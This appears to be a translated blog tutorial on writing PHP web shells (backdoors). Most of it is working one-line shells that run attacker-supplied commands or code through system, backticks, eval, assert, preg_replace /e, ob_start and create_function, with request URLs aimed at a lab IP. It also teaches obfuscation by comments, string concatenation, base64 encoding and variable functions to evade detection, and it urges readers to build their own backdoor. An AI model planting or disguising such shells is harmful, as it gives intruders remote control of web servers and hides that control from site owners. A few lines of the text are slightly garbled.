About the preparation of php backdoor

Category: Tags: ,

x1 principle

1. Functions to execute system commands
proc_open, popen, exec, shell_exec, passthru,system
Only two examples are given here, the others can be written in the php manual

system()

---------------------------
<?php
system($_GET['input']);
?>
---------------------------

http://192.168.247.133:81/shell.php?input=dir

“””Execute command
“Execute command is equivalent to shell_exec() function to execute command.

<?php
echo `$_GET[input]`;
?>
-------------------------------

http://192.168.247.133:81/shell.php?input=dir

Another shorter one

--------------------
<?=@`$_GET[c]`?>
-----------------------

http://192.168.247.133:81/shell.php?c=dir

Note: This should enable short_open_tag, but the default is on

2. Functions that can execute code
The eval() function calculates the string according to the PHP code. The string must be a valid PHP code and must end with a semicolon. g, but the default is on

<?php
eval($_GET['input']);
?>
----------------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

Regular expression

The function of Preg_replace is used to perform search and replacement of regular expressions. Mixed preg_replace (mixed pattern, mixed replacement, mixed subject, int limit, int &count) where Pattern is a regular expression used for search, and replacement is used The string to be replaced, submit is the string to be searched and replaced, limit is the number of strings that can be replaced, and count is the number of successful replacements. The function will return the replaced string. When the pattern parameter uses the /e modifier, the preg_replace function will execute the replacement parameter as PHP code.

<?php
preg_replace("//e",$_GET[‘input’],"qingsh4n");
?>
----------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

assert()
The assert function is used in the PHP language to determine whether an expression is valid. But its string parameters will be executed.

<?php
assert($_GET['input']);
?>
-----------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

ob_start()

--------------------
<?php
$foobar = $_GET['input1'];
ob_start($foobar);
echo $_GET['input2'];
ob_end_flush();
?>
---------------------

http://192.168.247.133:81/shell.php?input1=system&input2=dir

More functions need to be explored.

 

0x2: How to confuse

1. Comment/**/

---------------------
<?php
assert/**/($/**/{"_GET"}['input']);
?>
----------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

2. Connection symbol

“.” in php is a string connection symbol

<?php
$var = "a";
$var .= "ss";
$var .= "er";
$var .= "t";
$var($_GET['input']);
?>
---------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

Note: During the test, it was found that functions such as echo() and eval() are invalid.

 

3. Create a function
create_function() creates an anonymous function

<?php
$foobar = $_GET['input'];
$dyn_func = create_function('$qingsh4n', "echo $foobar;");
$dyn_func('');
?>
-----------------------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

 

4. Encoding function, base64, etc.

<?php
assert(base64_decode('ZXZhbCgkX0dFVFsnaW5wdXQnXSk7'));
?>
---------------------

http://192.168.247.133:81/shell.php?input=phpinfo();

Note: Other coding functions include gzinflate(), gzuncompress(), gzdecode(), str_rot13(), etc. You can check the php manual for writing.

 

5. Variable function
PHP supports the concept of variadic functions. This means that if there are parentheses after a variable name, PHP will look for a function with the same name as the value of the variable and try to execute it.

<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>
---------------------

If register_globals=on, the code can be changed to the following form:

<?php
$input1($input2);
?>
--------------------

http://192.168.247.133:81/shell.php?input1=system&input2=dir

Note: You can also use functions such as call_user_func(), array_walk(), etc.

0x3 write your own webshell

Through the above knowledge, you can arbitrarily combine the above code execution and obfuscation techniques to write your own PHP backdoor. Finally, I attach 6 ways to write about hello world, maybe you will find some inspiration here.

 

0x4:reference
http://www.php.net/
http://www.php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/index.html#sec22
http://www.t00ls.net/viewthread.php?tid=18951
http://hi.baidu.com/monyer/item/a218dbadf2afc7a828ce9d63
http://h.ackack.net/tiny-php-shell.html
http://www.rising.com.cn/newsletter/news/2012-06-27/11810.html

 

Reviews

There are no reviews yet.

Be the first to review “About the preparation of php backdoor”

Your email address will not be published. Required fields are marked *